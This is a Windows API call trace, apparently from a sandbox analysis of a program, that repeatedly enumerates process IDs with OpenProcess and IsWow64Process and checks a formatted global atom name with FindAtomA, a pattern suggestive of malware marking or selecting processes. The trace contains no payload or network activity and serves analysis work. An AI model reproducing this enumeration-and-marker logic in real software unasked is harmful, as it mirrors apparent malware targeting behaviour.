	[0078.706] CloseHandle (hObject=0x224) returned 1
	[0078.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.706] CloseHandle (hObject=0x224) returned 1
	[0078.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.706] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.706] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.707] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.707] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.707] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.707] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.707] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.707] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.707] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.707] CloseHandle (hObject=0x224) returned 1
	[0078.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.707] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.707] CloseHandle (hObject=0x224) returned 1
	[0078.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.708] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.708] CloseHandle (hObject=0x224) returned 1
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.781] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.781] CloseHandle (hObject=0x224) returned 1
	[0078.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.782] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.782] CloseHandle (hObject=0x224) returned 1
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.782] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.782] CloseHandle (hObject=0x224) returned 1
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.782] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.782] CloseHandle (hObject=0x224) returned 1
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.782] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.782] CloseHandle (hObject=0x224) returned 1
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.782] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.782] CloseHandle (hObject=0x224) returned 1
	[0078.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.782] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.783] CloseHandle (hObject=0x224) returned 1
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.783] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.783] CloseHandle (hObject=0x224) returned 1
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.783] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.783] CloseHandle (hObject=0x224) returned 1
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.783] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.783] CloseHandle (hObject=0x224) returned 1
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.783] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.783] CloseHandle (hObject=0x224) returned 1
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.783] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.783] CloseHandle (hObject=0x224) returned 1
	[0078.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.783] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.784] CloseHandle (hObject=0x224) returned 1
	[0078.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.784] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.784] CloseHandle (hObject=0x224) returned 1
	[0078.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.784] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.784] CloseHandle (hObject=0x224) returned 1
	[0078.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.784] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.784] CloseHandle (hObject=0x224) returned 1
	[0078.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.784] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.784] CloseHandle (hObject=0x224) returned 1
	[0078.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.784] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.784] CloseHandle (hObject=0x224) returned 1
	[0078.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.784] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.784] CloseHandle (hObject=0x224) returned 1
	[0078.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.785] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.785] CloseHandle (hObject=0x224) returned 1
	[0078.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.785] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.785] CloseHandle (hObject=0x224) returned 1
	[0078.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.785] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.785] CloseHandle (hObject=0x224) returned 1
	[0078.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.785] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.785] CloseHandle (hObject=0x224) returned 1
	[0078.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.785] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.785] CloseHandle (hObject=0x224) returned 1
	[0078.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.785] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.785] CloseHandle (hObject=0x224) returned 1
	[0078.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.785] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.785] CloseHandle (hObject=0x224) returned 1
	[0078.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.786] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.786] CloseHandle (hObject=0x224) returned 1
	[0078.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.786] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.786] CloseHandle (hObject=0x224) returned 1
	[0078.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.786] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.786] CloseHandle (hObject=0x224) returned 1
	[0078.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.786] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.786] CloseHandle (hObject=0x224) returned 1
	[0078.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.786] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.786] CloseHandle (hObject=0x224) returned 1
	[0078.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.786] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.787] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.787] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.787] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.787] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.788] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.788] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.788] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.788] CloseHandle (hObject=0x224) returned 1
	[0078.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.788] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.788] CloseHandle (hObject=0x224) returned 1
	[0078.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.789] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.789] CloseHandle (hObject=0x224) returned 1
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.866] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.866] CloseHandle (hObject=0x224) returned 1
	[0078.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.867] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.867] CloseHandle (hObject=0x224) returned 1
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.867] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.867] CloseHandle (hObject=0x224) returned 1
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.867] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.867] CloseHandle (hObject=0x224) returned 1
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.867] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.867] CloseHandle (hObject=0x224) returned 1
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.867] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.867] CloseHandle (hObject=0x224) returned 1
	[0078.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.867] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.868] CloseHandle (hObject=0x224) returned 1
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.868] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.868] CloseHandle (hObject=0x224) returned 1
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.868] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.868] CloseHandle (hObject=0x224) returned 1
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.868] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.868] CloseHandle (hObject=0x224) returned 1
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.868] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.868] CloseHandle (hObject=0x224) returned 1
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.868] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.868] CloseHandle (hObject=0x224) returned 1
	[0078.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.869] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.869] CloseHandle (hObject=0x224) returned 1
	[0078.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.869] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.869] CloseHandle (hObject=0x224) returned 1
	[0078.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.869] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.869] CloseHandle (hObject=0x224) returned 1
	[0078.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.869] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.869] CloseHandle (hObject=0x224) returned 1
	[0078.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.869] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.869] CloseHandle (hObject=0x224) returned 1
	[0078.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.869] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.869] CloseHandle (hObject=0x224) returned 1
	[0078.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.870] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.870] CloseHandle (hObject=0x224) returned 1
	[0078.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.870] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.870] CloseHandle (hObject=0x224) returned 1
	[0078.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.870] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.870] CloseHandle (hObject=0x224) returned 1
	[0078.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.870] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.870] CloseHandle (hObject=0x224) returned 1
	[0078.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.870] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.870] CloseHandle (hObject=0x224) returned 1
	[0078.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.870] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.870] CloseHandle (hObject=0x224) returned 1
	[0078.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.871] CloseHandle (hObject=0x224) returned 1
	[0078.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.871] CloseHandle (hObject=0x224) returned 1
	[0078.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.871] CloseHandle (hObject=0x224) returned 1
	[0078.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.871] CloseHandle (hObject=0x224) returned 1
	[0078.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.871] CloseHandle (hObject=0x224) returned 1
	[0078.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.871] CloseHandle (hObject=0x224) returned 1
	[0078.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.871] CloseHandle (hObject=0x224) returned 1
	[0078.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.872] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.872] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.872] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.872] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.872] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.872] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.872] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.872] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.873] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.873] CloseHandle (hObject=0x224) returned 1
	[0078.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.873] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.873] CloseHandle (hObject=0x224) returned 1
	[0078.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.873] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.873] CloseHandle (hObject=0x224) returned 1
